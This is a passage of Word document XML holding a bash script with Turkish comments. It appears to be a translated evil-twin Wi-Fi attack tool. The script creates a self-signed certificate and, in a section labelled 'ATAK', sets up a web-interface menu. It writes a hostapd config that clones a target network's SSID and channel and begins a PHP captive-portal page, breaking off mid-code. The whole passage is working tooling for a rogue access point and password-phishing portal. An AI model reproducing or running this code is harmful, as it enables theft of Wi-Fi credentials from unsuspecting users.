        <w:t>xterm -title "Kendinden İmzalı SSL Sertifikası Oluşturma" -e openssl req -subj '/CN=SEGURO/O=SEGURA/OU=SEGURA/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout $DUMP_PATH/server.pem -out $DUMP_PATH/server.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00873E18" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>certssl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65D005" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEA3D96" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="38498CC4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>############################################# &lt; SSL SERTİFİKASI &gt; ###################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA1CE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3123EB17" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="49FEA01B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>############################################# &lt; ATAK &gt; ############################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485101FA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="66C5A950" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Kullanılacak web arayüzünü seçin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FD4591" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function webinterface {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A62ADE8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#İzinleri Kendinden İmzalı SSL Sertifikasına Ayarlama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B67C25" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>chmod 400 $DUMP_PATH/server.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C54944" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3898ADE4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>while true; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453C4CA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB165BB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C988370" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F7249E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>infoap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144C5CC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3664FB73" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "WEB ARAYÜZÜNÜ SEÇİN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F4A89" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AB48DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A16C04A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "$yesil""1)"$yenidenrenklendir" Genel arayüz"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DBC2B5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "$yesil""2)"$yenidenrenklendir" \e[1;31mÇıkış"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC95BD7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D528E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E67E2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "#? "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F33ED4B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162325D3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6ECAD8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ "$line" = "2" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68AD56" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>exitmode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CEB987" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>elif [ "$line" = "1" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B01821" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>conditional_clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9A8AA6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C5C1EB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAD3660" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>infoap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0BF131" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830C96E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo "DİL SEÇİN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AC58A1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0DFE4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A3201" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "$yesil""1)"$yenidenrenklendir" Turkce[TR]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD13B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A855C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5B0AE4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -n "#? "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD9908" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>read linea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A49756" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>language=${webinterfaceslenguage[$line]}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224E6009" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7100A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if [ "$linea" = "1" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BF1BA5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C94807E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08122117" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C357D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_OK=$DIALOG_WEB_OK_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FECD6DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFB25E4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9543F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_LENGHT_MIN=$DIALOG_WEB_LENGHT_MIN_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51EC78" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_LENGHT_MAX=$DIALOG_WEB_LENGHT_MAX_ENG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E9B3E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>NEUTRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA76595" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0D599" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>elif [ "$linea" = "2" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053F51EF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69370155" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3B0CF7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6D5FEF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_OK=$DIALOG_WEB_OK_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11062593" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC3266" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21863D29" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_LENGHT_MIN=$DIALOG_WEB_LENGHT_MIN_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E51A06" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>DIALOG_WEB_LENGHT_MAX=$DIALOG_WEB_LENGHT_MAX_ESP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312420A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>NEUTRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5204D97E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F188D2B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEC6EA9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>elif [ "$linea" = "6" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DFA2D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18534D58" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAD6E6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A31CA8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F3079" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72436AD2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>preattack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F65E477" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FA6B8B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFC83D1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Komut dosyası için gerekli farklı konfigürasyonları oluşturun ve hizmetleri hazırlayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2159DE57" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function preattack {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB37B5C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73904465" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Genera el config de hostapd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009CDDF1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "interface=$WIFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB14C9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>driver=nl80211</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67591944" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>ssid=$Host_SSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602B3E86" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>channel=$Host_CHAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A83BA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>"&gt;$DUMP_PATH/hostapd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6C69BD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3621322E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Crea el php que usan las ifaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328EE33B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>echo "&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB02414" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>error_reporting(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3664DE58" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="56B2AFF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$count_my_page = (\"$DUMP_PATH/hit.txt\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015299D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$hits = file(\$count_my_page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EA3D2E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$hits[0] ++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433A030C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>\$fp = fopen(\$count_my_page , \"w\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393CE6F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fputs(\$fp , \"\$hits[0]\");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78634173" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fclose(\$fp);</w:t>
      </w:r>
    </w:p>
